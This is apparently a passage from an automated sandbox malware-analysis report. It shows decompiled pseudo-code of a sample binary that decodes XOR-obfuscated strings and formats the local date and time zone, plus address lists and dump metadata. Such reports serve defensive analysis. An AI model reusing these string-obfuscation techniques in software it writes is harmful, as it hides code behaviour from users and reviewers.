                                                                    				_v15 = 0x7b;
                                                                    				_v14 = 0x33;
                                                                    				_v13 = 0x35;
                                                                    				_v12 = 0x6b;
                                                                    				_v11 = 0x27;
                                                                    				_v10 = 0x35;
                                                                    				_v9 = 0x25;
                                                                    				_v8 = 0x2f;
                                                                    				_v7 = 0x2f;
                                                                    				_v6 = 0x4b;
                                                                    				_v5 = 0x4c;
                                                                    				_v4 = 0x46;
                                                                    				_t135 = 0;
                                                                    				do {
                                                                    					if(_t112 >= 0x28) {
                                                                    						_t112 = _t112 | 0x0000002f;
                                                                    					} else {
                                                                    						_t112 = _t112 + 0x60;
                                                                    					}
                                                                    					 *(_t170 + _t135 + 0x34) =  *(_t170 + _t135 + 0x34) ^ 0x00000046;
                                                                    					_t135 = _t135 + 1;
                                                                    				} while (_t135 < 0x2d);
                                                                    				_t114 = E0041A0C0( &_v48);
                                                                    				_t166 = _a4;
                                                                    				_t171 = _t170 + 4;
                                                                    				if(E00419410(_t114, _a4,  &_v48, _t114) != 0xffffffff) {
                                                                    					_v75 = 0x52;
                                                                    					_v69 = 0x52;
                                                                    					_v82 = 0x4e;
                                                                    					_v80 = 0x45;
                                                                    					_v79 = 0x4e;
                                                                    					_v73 = 0x4e;
                                                                    					_v70 = 0x45;
                                                                    					_v66 = 0x4e;
                                                                    					_v61 = 0x4e;
                                                                    					_v62 = 0x49;
                                                                    					 *((char*)(_t171 + 0x2d)) = 0x49;
                                                                    					_t140 =  *0x447b04; // 0x0
                                                                    					_t118 = _a4 + (_a4 ^ _t140 ^ 0x00000054) * 0x6c;
                                                                    					_v84 = 0x63;
                                                                    					_v83 = 0x4f;
                                                                    					_v81 = 0x54;
                                                                    					_v78 = 0x54;
                                                                    					_v77 = 0xd;
                                                                    					_v76 = 0x74;
                                                                    					_v74 = 0x41;
                                                                    					_v72 = 0x53;
                                                                    					_v71 = 0x46;
                                                                    					_v68 = 0xd;
                                                                    					_v67 = 0x65;
                                                                    					_v65 = 0x43;
                                                                    					_v64 = 0x4f;
                                                                    					_v63 = 0x44;
                                                                    					_v60 = 0x47;
                                                                    					_v59 = 0x1a;
                                                                    					 *((char*)(_t171 + 0x2a)) = 0;
                                                                    					 *((char*)(_t171 + 0x2b)) = 0x17;
                                                                    					 *((char*)(_t171 + 0x2c)) = 0x42;
                                                                    					 *((char*)(_t171 + 0x2e)) = 0x54;
                                                                    					 *((char*)(_t171 + 0x2f)) = 0x2d;
                                                                    					 *((char*)(_t171 + 0x30)) = 0x2a;
                                                                    					 *((char*)(_t171 + 0x31)) = 0x20;
                                                                    					_t141 = 0;
                                                                    					do {
                                                                    						if(_t118 >= 0x28) {
                                                                    							_t118 = _t118 | 0x0000002f;
                                                                    						} else {
                                                                    							_t118 = _t118 + 0x60;
                                                                    						}
                                                                    						 *(_t171 + _t141 + 0x10) =  *(_t171 + _t141 + 0x10) ^ 0x00000020;
                                                                    						_t141 = _t141 + 1;
                                                                    					} while (_t141 < 0x22);
                                                                    					if(E00419410(E0041A0C0( &_v84), _t166,  &_v84, _t120) == 0xffffffff) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t123 =  *((intOrPtr*)(_t169 + 0x84));
                                                                    						if( *((intOrPtr*)(_t169 + 0x84)) == 0) {
                                                                    							L19:
                                                                    							return 0 | E00419410( &_v88, _t166,  &_v88, 2) != 0xffffffff;
                                                                    						} else {
                                                                    							if(E00419410(_t123, _t166,  &_v88, 2) == 0xffffffff) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								_t148 =  *((intOrPtr*)(_t169 + 0x84));
                                                                    								if( *((intOrPtr*)(_t169 + 0x88)) < 0x10) {
                                                                    									_t128 = _t169 + 0x74;
                                                                    								} else {
                                                                    									_t128 =  *((intOrPtr*)(_t169 + 0x74));
                                                                    								}
                                                                    								if(E00419410(_t128, _t166, _t128, _t148) == 0xffffffff) {
                                                                    									goto L6;
                                                                    								} else {
                                                                    									goto L19;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					L6:
                                                                    					return 0;
                                                                    				}
                                                                    			}































































































                                                                    0x0040c070
                                                                    0x0040c07b
                                                                    0x0040c07d
                                                                    0x0040c091
                                                                    0x0040c095
                                                                    0x0040c099
                                                                    0x0040c09d
                                                                    0x0040c0a1
                                                                    0x0040c0a5
                                                                    0x0040c0a9
                                                                    0x0040c0ad
                                                                    0x0040c0b1
                                                                    0x0040c0c5
                                                                    0x0040c0c9
                                                                    0x0040c0cf
                                                                    0x0040c0d2
                                                                    0x0040c0d7
                                                                    0x0040c0dc
                                                                    0x0040c0e1
                                                                    0x0040c0e6
                                                                    0x0040c0eb
                                                                    0x0040c0f0
                                                                    0x0040c0f5
                                                                    0x0040c0fa
                                                                    0x0040c0ff
                                                                    0x0040c104
                                                                    0x0040c109
                                                                    0x0040c10e
                                                                    0x0040c113
                                                                    0x0040c118
                                                                    0x0040c11d
                                                                    0x0040c122
                                                                    0x0040c127
                                                                    0x0040c12c
                                                                    0x0040c131
                                                                    0x0040c136
                                                                    0x0040c13b
                                                                    0x0040c140
                                                                    0x0040c145
                                                                    0x0040c14a
                                                                    0x0040c14e
                                                                    0x0040c153
                                                                    0x0040c158
                                                                    0x0040c15c
                                                                    0x0040c161
                                                                    0x0040c166
                                                                    0x0040c16a
                                                                    0x0040c16f
                                                                    0x0040c174
                                                                    0x0040c179
                                                                    0x0040c17e
                                                                    0x0040c183
                                                                    0x0040c188
                                                                    0x0040c190
                                                                    0x0040c193
                                                                    0x0040c19a
                                                                    0x0040c195
                                                                    0x0040c195
                                                                    0x0040c195
                                                                    0x0040c19d
                                                                    0x0040c1a2
                                                                    0x0040c1a3
                                                                    0x0040c1ad
                                                                    0x0040c1b2
                                                                    0x0040c1b6
                                                                    0x0040c1c9
                                                                    0x0040c1da
                                                                    0x0040c1de
                                                                    0x0040c1e6
                                                                    0x0040c1ea
                                                                    0x0040c1ee
                                                                    0x0040c1f2
                                                                    0x0040c1f6
                                                                    0x0040c1fa
                                                                    0x0040c1fe
                                                                    0x0040c206
                                                                    0x0040c20a
                                                                    0x0040c20e
                                                                    0x0040c220
                                                                    0x0040c222
                                                                    0x0040c227
                                                                    0x0040c22b
                                                                    0x0040c230
                                                                    0x0040c235
                                                                    0x0040c23a
                                                                    0x0040c23f
                                                                    0x0040c244
                                                                    0x0040c249
                                                                    0x0040c24e
                                                                    0x0040c253
                                                                    0x0040c258
                                                                    0x0040c25d
                                                                    0x0040c261
                                                                    0x0040c266
                                                                    0x0040c26b
                                                                    0x0040c270
                                                                    0x0040c275
                                                                    0x0040c27a
                                                                    0x0040c27f
                                                                    0x0040c284
                                                                    0x0040c289
                                                                    0x0040c28e
                                                                    0x0040c293
                                                                    0x0040c295
                                                                    0x0040c298
                                                                    0x0040c29f
                                                                    0x0040c29a
                                                                    0x0040c29a
                                                                    0x0040c29a
                                                                    0x0040c2a2
                                                                    0x0040c2a7
                                                                    0x0040c2a8
                                                                    0x0040c2ca
                                                                    0x00000000
                                                                    0x0040c2d0
                                                                    0x0040c2d0
                                                                    0x0040c2d8
                                                                    0x0040c31a
                                                                    0x0040c338
                                                                    0x0040c2da
                                                                    0x0040c2eb
                                                                    0x00000000
                                                                    0x0040c2f1
                                                                    0x0040c2f8
                                                                    0x0040c2fe
                                                                    0x0040c305
                                                                    0x0040c300
                                                                    0x0040c300
                                                                    0x0040c300
                                                                    0x0040c314
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040c314
                                                                    0x0040c2eb
                                                                    0x0040c2d8
                                                                    0x0040c1cb
                                                                    0x0040c1cb
                                                                    0x0040c1d3
                                                                    0x0040c1d3

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $%$%$'$'$'$($($($)$*$*$-$.$/$/$/$3$4$6$6$>$?$A$B$C$D$F$F$F$G$K$L$S$T$T$T$e$i$k$k$t${$|$}
                                                                    • API String ID: 0-3180466105
                                                                    • Opcode ID: 722597b4fe0ce1a50270f554338a7d0c83f693f45401547718ee63e2feb77018
                                                                    • Instruction ID: 0f7e0acba2e7bdb2b6a5da264052e21e39eb7588987691f230c5b734eab947e2
                                                                    • Opcode Fuzzy Hash: 722597b4fe0ce1a50270f554338a7d0c83f693f45401547718ee63e2feb77018
                                                                    • Instruction Fuzzy Hash: 75912A2110D3C0CAD316C678948879BBFD11BA6308F4859AEF1D59B283D6BAC64DC76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E0040B470(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				struct _TIME_ZONE_INFORMATION _v180;
                                                                    				intOrPtr _v184;
                                                                    				struct _SYSTEMTIME _v200;
                                                                    				signed short _v204;
                                                                    				signed int _v208;
                                                                    				char _v211;
                                                                    				char _v212;
                                                                    				char _v213;
                                                                    				char _v214;
                                                                    				char _v215;
                                                                    				char _v216;
                                                                    				char _v217;
                                                                    				char _v218;
                                                                    				char _v219;
                                                                    				char _v220;
                                                                    				char _v221;
                                                                    				char _v222;
                                                                    				char _v223;
                                                                    				char _v224;
                                                                    				char _v225;
                                                                    				char _v226;
                                                                    				char _v227;
                                                                    				char _v228;
                                                                    				char _v229;
                                                                    				char _v230;
                                                                    				char _v231;
                                                                    				char _v232;
                                                                    				char _v233;
                                                                    				char _v234;
                                                                    				char _v235;
                                                                    				char _v236;
                                                                    				char _v237;
                                                                    				char _v238;
                                                                    				char _v239;
                                                                    				char _v240;
                                                                    				char _v241;
                                                                    				char _v242;
                                                                    				char _v243;
                                                                    				char _v244;
                                                                    				char _v245;
                                                                    				char _v246;
                                                                    				char _v247;
                                                                    				char _v248;
                                                                    				char _v249;
                                                                    				char _v250;
                                                                    				char _v251;
                                                                    				char _v252;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				signed int _v304;
                                                                    				signed int _v308;
                                                                    				signed int _v312;
                                                                    				signed int _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				signed int _v320;
                                                                    				char _v321;
                                                                    				char _v322;
                                                                    				char _v323;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				intOrPtr _v332;
                                                                    				char _v333;
                                                                    				char _v334;
                                                                    				char _v335;
                                                                    				char _v336;
                                                                    				char _v337;
                                                                    				char _v338;
                                                                    				char _v339;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v345;
                                                                    				char _v346;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v350;
                                                                    				char _v354;
                                                                    				intOrPtr _v356;
                                                                    				char _v358;
                                                                    				intOrPtr _v360;
                                                                    				char _v362;
                                                                    				char _v366;
                                                                    				intOrPtr _v368;
                                                                    				char _v370;
                                                                    				char _v374;
                                                                    				char _v378;
                                                                    				intOrPtr _v380;
                                                                    				char _v382;
                                                                    				char _v386;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t293;
                                                                    				intOrPtr _t308;
                                                                    				intOrPtr _t310;
                                                                    				void* _t314;
                                                                    				signed int _t315;
                                                                    				signed int _t316;
                                                                    				signed int _t317;
                                                                    				signed short _t318;
                                                                    				signed short _t319;
                                                                    				signed short _t320;
                                                                    				void* _t323;
                                                                    				signed int _t336;
                                                                    				signed int _t345;
                                                                    
                                                                    				if(_a4 == 0) {
                                                                    					L27:
                                                                    					return 0x26;
                                                                    				} else {
                                                                    					if(_a8 >= 0x26) {
                                                                    						_v342 = 0xdd;
                                                                    						_v272 = 0x97;
                                                                    						_v271 = 0xbc;
                                                                    						_v270 = 0xb3;
                                                                    						_v269 = 0xdd;
                                                                    						_v320 = E0040B420(4,  &_v272,  &_v342);
                                                                    						_v346 = 0x9a;
                                                                    						_v304 = 0xdc;
                                                                    						_v303 = 0xff;
                                                                    						_v302 = 0xf8;
                                                                    						_v301 = 0x9a;
                                                                    						_v312 = E0040B420(4,  &_v304,  &_v346);
                                                                    						_v350 = 0xdd;
                                                                    						_v276 = 0x90;
                                                                    						_v275 = 0xbc;
                                                                    						_v274 = 0xaf;
                                                                    						_v273 = 0xdd;
                                                                    						_v324 = E0040B420(4,  &_v276,  &_v350);
                                                                    						_v354 = 0xc4;
                                                                    						_v293 = 0xc4;
                                                                    						_v296 = 0x85;
                                                                    						_v295 = 0xb4;
                                                                    						_v294 = 0xb6;
                                                                    						_v336 = E0040B420(4,  &_v296,  &_v354);
                                                                    						_v358 = 0xae;
                                                                    						_v292 = 0xe3;
                                                                    						_v291 = 0xcf;
                                                                    						_v290 = 0xd7;
                                                                    						_v289 = 0xae;
                                                                    						_v348 = E0040B420(4,  &_v292,  &_v358);
                                                                    						_v362 = 0x22;
                                                                    						_v280 = 0x68;
                                                                    						_v279 = 0x57;
                                                                    						_v278 = 0x4c;
                                                                    						_v277 = 0x22;
                                                                    						_v356 = E0040B420(4,  &_v280,  &_v362);
                                                                    						_v366 = 0x2e;
                                                                    						_v277 = 0x2e;
                                                                    						_v280 = 0x64;
                                                                    						_v279 = 0x5b;
                                                                    						_v278 = 0x42;
                                                                    						_v336 = E0040B420(4,  &_v280,  &_v366);
                                                                    						_v370 = 0xd7;
                                                                    						_v292 = 0x96;
                                                                    						_v291 = 0xa2;
                                                                    						_v290 = 0xb0;
                                                                    						_v289 = 0xd7;
                                                                    						_v368 = E0040B420(4,  &_v292,  &_v370);
                                                                    						_v374 = 0xbe;
                                                                    						_v328 = 0xed;
                                                                    						_v327 = 0xdb;
                                                                    						_v326 = 0xce;
                                                                    						_v325 = 0xbe;
                                                                    						_v360 = E0040B420(4,  &_v328,  &_v374);
                                                                    						_v378 = 0xf3;
                                                                    						_v321 = 0xf3;
                                                                    						_v324 = 0xbc;
                                                                    						_v323 = 0x90;
                                                                    						_v322 = 0x87;
                                                                    						_v380 = E0040B420(4,  &_v324,  &_v378);
                                                                    						_v382 = 0x4c;
                                                                    						_v320 = 2;
                                                                    						_v319 = 0x23;
                                                                    						_v318 = 0x3a;
                                                                    						_v317 = 0x4c;
                                                                    						_v252 = E0040B420(4,  &_v320,  &_v382);
                                                                    						_v386 = 0x66;
                                                                    						_v336 = 0x22;
                                                                    						_v335 = 3;
                                                                    						_v334 = 5;
                                                                    						_v333 = 0x66;
                                                                    						_t293 = E0040B420(4,  &_v336,  &_v386);
                                                                    						_t345 =  *0x447b54; // 0x0
                                                                    						if(0 == 0) {
                                                                    							 *0x447b24 = _v316;
                                                                    							 *0x447b28 = _v304;
                                                                    							 *0x447b2c = _v312;
                                                                    							 *0x447b30 = _v320;
                                                                    							 *0x447b34 = _v328;
                                                                    							 *0x447b38 = _v332;
                                                                    							 *0x447b3c = _v308;
                                                                    							 *0x447b40 = _v336;
                                                                    							 *0x447b44 = _v324;
                                                                    							_t345 = _t345 | 0x00000001;
                                                                    							 *0x447b54 = _t345;
                                                                    							 *0x447b48 = _v340;
                                                                    							 *0x447b4c = _v208;
                                                                    							 *0x447b50 = _t293;
                                                                    						}
                                                                    						_v342 = 0xf0;
                                                                    						_v340 = 0xa3;
                                                                    						_v339 = 0x85;
                                                                    						_v338 = 0x9e;
                                                                    						_v337 = 0xf0;
                                                                    						_v212 = E0040B420(4,  &_v340,  &_v342);
                                                                    						_v346 = 0xe9;
                                                                    						_v325 = 0xe9;
                                                                    						_v328 = 0xa4;
                                                                    						_v327 = 0x86;
                                                                    						_v326 = 0x87;
                                                                    						_v324 = E0040B420(4,  &_v328,  &_v346);
                                                                    						_v350 = 0x98;
                                                                    						_v344 = 0xcc;
                                                                    						_v343 = 0xed;
                                                                    						_v342 = 0xfd;
                                                                    						_v341 = 0x98;
                                                                    						_v316 = E0040B420(4,  &_v344,  &_v350);
                                                                    						_v354 = 0x8e;
                                                                    						_v320 = 0xd9;
                                                                    						_v319 = 0xeb;
                                                                    						_v318 = 0xea;
                                                                    						_v317 = 0x8e;
                                                                    						_v328 = E0040B420(4,  &_v320,  &_v354);
                                                                    						_v358 = 0x17;
                                                                    						_v345 = 0x17;
                                                                    						_v348 = 0x43;
                                                                    						_v347 = 0x7f;
                                                                    						_v346 = 0x62;
                                                                    						_v204 = E0040B420(4,  &_v348,  &_v358);
                                                                    						_v362 = 0x36;
                                                                    						_v348 = 0x70;
                                                                    						_v347 = 0x44;
                                                                    						_v346 = 0x5f;
                                                                    						_v345 = 0x36;
                                                                    						_v228 = E0040B420(4,  &_v348,  &_v362);
                                                                    						_v366 = 0xf8;
                                                                    						_v344 = 0xab;
                                                                    						_v343 = 0x99;
                                                                    						_v342 = 0x8c;
                                                                    						_v341 = 0xf8;
                                                                    						_t308 = E0040B420(4,  &_v344,  &_v366);
                                                                    						if((_t345 & 0x00000002) == 0) {
                                                                    							 *0x447b08 = _v208;
                                                                    							 *0x447b0c = _v316;
                                                                    							 *0x447b10 = _v304;
                                                                    							 *0x447b14 = _v312;
                                                                    							 *0x447b54 = _t345 | 0x00000002;
                                                                    							 *0x447b18 = _v184;
                                                                    							 *0x447b1c = _v204;
                                                                    							 *0x447b20 = _t308;
                                                                    						}
                                                                    						_v342 = 0x2d;
                                                                    						_v304 = 0;
                                                                    						_v312 = 0;
                                                                    						GetLocalTime( &_v200);
                                                                    						_t310 = _a12;
                                                                    						if(_v200.wMinute <= _t310) {
                                                                    							_v200.wMinute = 0;
                                                                    						} else {
                                                                    							_v200.wMinute = _v200.wMinute - _t310;
                                                                    						}
                                                                    						memset( &_v180, 0, 0x2b << 2);
                                                                    						_t314 = GetTimeZoneInformation( &_v180) - 1;
                                                                    						if(_t314 == 0) {
                                                                    							_t315 = _v180.StandardBias + _v180.Bias;
                                                                    						} else {
                                                                    							_t315 = _v180.Bias;
                                                                    							if(_t314 == 1) {
                                                                    								_t315 = _t315 + _v180.DaylightBias;
                                                                    							}
                                                                    						}
                                                                    						if(_a16 != 0) {
                                                                    							asm("cdq");
                                                                    							_t336 = _t315 / 0x3c;
                                                                    							_v304 = _t336;
                                                                    							_v312 = _t315 % 0x3c;
                                                                    							_v342 = (_t336 & 0xffffff00 | _t336 >= 0x00000000) + (_t336 & 0xffffff00 | _t336 >= 0x00000000) + 0x2b;
                                                                    						}
                                                                    						_t316 =  *0x447b04; // 0x0
                                                                    						if(_t316 >= 0x24) {
                                                                    							_t317 = _t316 ^ 0x0000006b;
                                                                    						} else {
                                                                    							_t317 = _t316 | 0x0000005a;
                                                                    						}
                                                                    						 *0x447b04 = _t317;
                                                                    						_t318 = _v200.wDayOfWeek;
                                                                    						if(_t318 <= 6) {
                                                                    							_v316 = _t318 & 0x0000ffff;
                                                                    						} else {
                                                                    							_v316 = 0;
                                                                    						}
                                                                    						_t319 = _v200.wMonth;
                                                                    						if(_t319 < 1 || _t319 > 0xc) {
                                                                    							_t320 = 0;
                                                                    						} else {
                                                                    							_t320 = _t319 - 1;
                                                                    						}
                                                                    						_v200.wMonth = _t320;
                                                                    						_v246 = 0x4f;
                                                                    						_v238 = 0x4f;
                                                                    						_v233 = 0x4f;
                                                                    						_v228 = 0x4f;
                                                                    						_v223 = 0x4f;
                                                                    						_v216 = 0x4f;
                                                                    						_v212 = 0x4f;
                                                                    						_v204 = _t320 & 0x0000ffff;
                                                                    						_v251 = 0x18;
                                                                    						_v250 = 0x58;
                                                                    						_v243 = 0x18;
                                                                    						_v242 = 0x58;
                                                                    						_v341 = 0x2b;
                                                                    						_v252 = 0xe;
                                                                    						_v249 = 7;
                                                                    						_v248 = 0xb;
                                                                    						_v247 = 0xe;
                                                                    						_v245 = 0xb;
                                                                    						_v244 = 0xe;
                                                                    						_v241 = 0xb;
                                                                    						_v240 = 0xe;
                                                                    						_v239 = 0x1f;
                                                                    						_v237 = 0xb;
                                                                    						_v236 = 0xe;
                                                                    						_v235 = 0x1b;
                                                                    						_v234 = 0x19;
                                                                    						_v232 = 0x11;
                                                                    						_v231 = 0xe;
                                                                    						_v230 = 0x1b;
                                                                    						_v229 = 0x19;
                                                                    						_v227 = 0x11;
                                                                    						_v226 = 0xe;
                                                                    						_v225 = 0x1b;
                                                                    						_v224 = 0x19;
                                                                    						_v222 = 0xb;
                                                                    						_v221 = 0xe;
                                                                    						_v220 = 0x48;
                                                                    						_v219 = 0xe;
                                                                    						_v218 = 0x1b;
                                                                    						_v217 = 0x19;
                                                                    						_v215 = 0xe;
                                                                    						_v214 = 0x1b;
                                                                    						_v213 = 0x19;
                                                                    						_v211 = 0x2b;
                                                                    						_t323 = E0040B420(0x2a,  &_v252,  &_v341);
                                                                    						E0041E5F0();
                                                                    						asm("cdq");
                                                                    						asm("cdq");
                                                                    						 *0x44aec8(_a4, _t323,  *((intOrPtr*)(0x447b08 + _v320 * 4)), _v200.wMonth & 0x0000ffff,  *((intOrPtr*)(0x447b24 + _v208 * 4)), _v204 & 0x0000ffff, _v200.wDayOfWeek & 0x0000ffff, _v200.wDay & 0x0000ffff, _v200.wHour & 0x0000ffff, _v346, (_v308 ^ 0x00000019) - 0x19, (_v316 ^ 0x00000019) - 0x19);
                                                                    						goto L27;
                                                                    					} else {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}







































































































































                                                                    0x0040b484
                                                                    0x0040bb4c
                                                                    0x0040bb57
                                                                    0x0040b48a
                                                                    0x0040b48e
                                                                    0x0040b4a9
                                                                    0x0040b4ad
                                                                    0x0040b4b2
                                                                    0x0040b4b7
                                                                    0x0040b4bc
                                                                    0x0040b4c5
                                                                    0x0040b4d4
                                                                    0x0040b4d8
                                                                    0x0040b4dd
                                                                    0x0040b4e2
                                                                    0x0040b4e7
                                                                    0x0040b4f9
                                                                    0x0040b4fd
                                                                    0x0040b501
                                                                    0x0040b506
                                                                    0x0040b50b
                                                                    0x0040b510
                                                                    0x0040b519
                                                                    0x0040b51f
                                                                    0x0040b523
                                                                    0x0040b530
                                                                    0x0040b535
                                                                    0x0040b53a
                                                                    0x0040b544
                                                                    0x0040b553
                                                                    0x0040b557
                                                                    0x0040b55c
                                                                    0x0040b561
                                                                    0x0040b566
                                                                    0x0040b57a
                                                                    0x0040b57e
                                                                    0x0040b583
                                                                    0x0040b588
                                                                    0x0040b58d
                                                                    0x0040b591
                                                                    0x0040b59b
                                                                    0x0040b5a1
                                                                    0x0040b5a5
                                                                    0x0040b5b2
                                                                    0x0040b5b7
                                                                    0x0040b5bc
                                                                    0x0040b5c6
                                                                    0x0040b5ca
                                                                    0x0040b5cf
                                                                    0x0040b5d4
                                                                    0x0040b5d9
                                                                    0x0040b5e7
                                                                    0x0040b5f1
                                                                    0x0040b600
                                                                    0x0040b604
                                                                    0x0040b609
                                                                    0x0040b60e
                                                                    0x0040b613
                                                                    0x0040b61c
                                                                    0x0040b622
                                                                    0x0040b626
                                                                    0x0040b633
                                                                    0x0040b638
                                                                    0x0040b63d
                                                                    0x0040b650
                                                                    0x0040b654
                                                                    0x0040b658
                                                                    0x0040b65d
                                                                    0x0040b662
                                                                    0x0040b667
                                                                    0x0040b670
                                                                    0x0040b682
                                                                    0x0040b686
                                                                    0x0040b68b
                                                                    0x0040b690
                                                                    0x0040b695
                                                                    0x0040b699
                                                                    0x0040b69e
                                                                    0x0040b6a7
                                                                    0x0040b6b1
                                                                    0x0040b6bb
                                                                    0x0040b6c5
                                                                    0x0040b6cf
                                                                    0x0040b6d9
                                                                    0x0040b6e3
                                                                    0x0040b6ed
                                                                    0x0040b6f7
                                                                    0x0040b701
                                                                    0x0040b70e
                                                                    0x0040b711
                                                                    0x0040b717
                                                                    0x0040b71d
                                                                    0x0040b723
                                                                    0x0040b723
                                                                    0x0040b738
                                                                    0x0040b73c
                                                                    0x0040b741
                                                                    0x0040b746
                                                                    0x0040b74b
                                                                    0x0040b754
                                                                    0x0040b75d
                                                                    0x0040b761
                                                                    0x0040b76e
                                                                    0x0040b773
                                                                    0x0040b778
                                                                    0x0040b782
                                                                    0x0040b791
                                                                    0x0040b795
                                                                    0x0040b79a
                                                                    0x0040b79f
                                                                    0x0040b7a4
                                                                    0x0040b7ad
                                                                    0x0040b7bc
                                                                    0x0040b7c0
                                                                    0x0040b7c5
                                                                    0x0040b7ca
                                                                    0x0040b7cf
                                                                    0x0040b7d8
                                                                    0x0040b7de
                                                                    0x0040b7e2
                                                                    0x0040b7ef
                                                                    0x0040b7f4
                                                                    0x0040b7f9
                                                                    0x0040b803
                                                                    0x0040b815
                                                                    0x0040b819
                                                                    0x0040b81e
                                                                    0x0040b823
                                                                    0x0040b828
                                                                    0x0040b83a
                                                                    0x0040b841
                                                                    0x0040b846
                                                                    0x0040b84b
                                                                    0x0040b850
                                                                    0x0040b855
                                                                    0x0040b85a
                                                                    0x0040b862
                                                                    0x0040b86f
                                                                    0x0040b879
                                                                    0x0040b883
                                                                    0x0040b890
                                                                    0x0040b8a0
                                                                    0x0040b8a6
                                                                    0x0040b8ac
                                                                    0x0040b8b2
                                                                    0x0040b8b2
                                                                    0x0040b8c1
                                                                    0x0040b8c6
                                                                    0x0040b8ca
                                                                    0x0040b8ce
                                                                    0x0040b8d4
                                                                    0x0040b8e0
                                                                    0x0040b8ec
                                                                    0x0040b8e2
                                                                    0x0040b8e2
                                                                    0x0040b8e2
                                                                    0x0040b902
                                                                    0x0040b912
                                                                    0x0040b913
                                                                    0x0040b938
                                                                    0x0040b915
                                                                    0x0040b916
                                                                    0x0040b91d
                                                                    0x0040b926
                                                                    0x0040b926
                                                                    0x0040b91d
                                                                    0x0040b93e
                                                                    0x0040b940
                                                                    0x0040b946
                                                                    0x0040b94a
                                                                    0x0040b951
                                                                    0x0040b959
                                                                    0x0040b959
                                                                    0x0040b95d
                                                                    0x0040b965
                                                                    0x0040b96c
                                                                    0x0040b967
                                                                    0x0040b967
                                                                    0x0040b967
                                                                    0x0040b96f
                                                                    0x0040b974
                                                                    0x0040b980
                                                                    0x0040b98b
                                                                    0x0040b982
                                                                    0x0040b982
                                                                    0x0040b982
                                                                    0x0040b98f
                                                                    0x0040b99b
                                                                    0x0040b9a7
                                                                    0x0040b9a3
                                                                    0x0040b9a3
                                                                    0x0040b9a3
                                                                    0x0040b9ac
                                                                    0x0040b9bb
                                                                    0x0040b9bf
                                                                    0x0040b9c3
                                                                    0x0040b9c7
                                                                    0x0040b9ce
                                                                    0x0040b9d5
                                                                    0x0040b9dc
                                                                    0x0040b9e3
                                                                    0x0040b9ec
                                                                    0x0040b9f0
                                                                    0x0040b9f4
                                                                    0x0040b9fa
                                                                    0x0040ba0e
                                                                    0x0040ba13
                                                                    0x0040ba17
                                                                    0x0040ba1c
                                                                    0x0040ba21
                                                                    0x0040ba25
                                                                    0x0040ba2a
                                                                    0x0040ba2e
                                                                    0x0040ba33
                                                                    0x0040ba37
                                                                    0x0040ba3c
                                                                    0x0040ba41
                                                                    0x0040ba45
                                                                    0x0040ba49
                                                                    0x0040ba4d
                                                                    0x0040ba55
                                                                    0x0040ba5c
                                                                    0x0040ba63
                                                                    0x0040ba6a
                                                                    0x0040ba72
                                                                    0x0040ba79
                                                                    0x0040ba80
                                                                    0x0040ba87
                                                                    0x0040ba8f
                                                                    0x0040ba96
                                                                    0x0040ba9e
                                                                    0x0040baa5
                                                                    0x0040baac
                                                                    0x0040bab3
                                                                    0x0040baba
                                                                    0x0040bac1
                                                                    0x0040bac8
                                                                    0x0040bad0
                                                                    0x0040bad7
                                                                    0x0040bae8
                                                                    0x0040baf2
                                                                    0x0040bb43
                                                                    0x00000000
                                                                    0x0040b490
                                                                    0x0040b498
                                                                    0x0040b498
                                                                    0x0040b48e

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
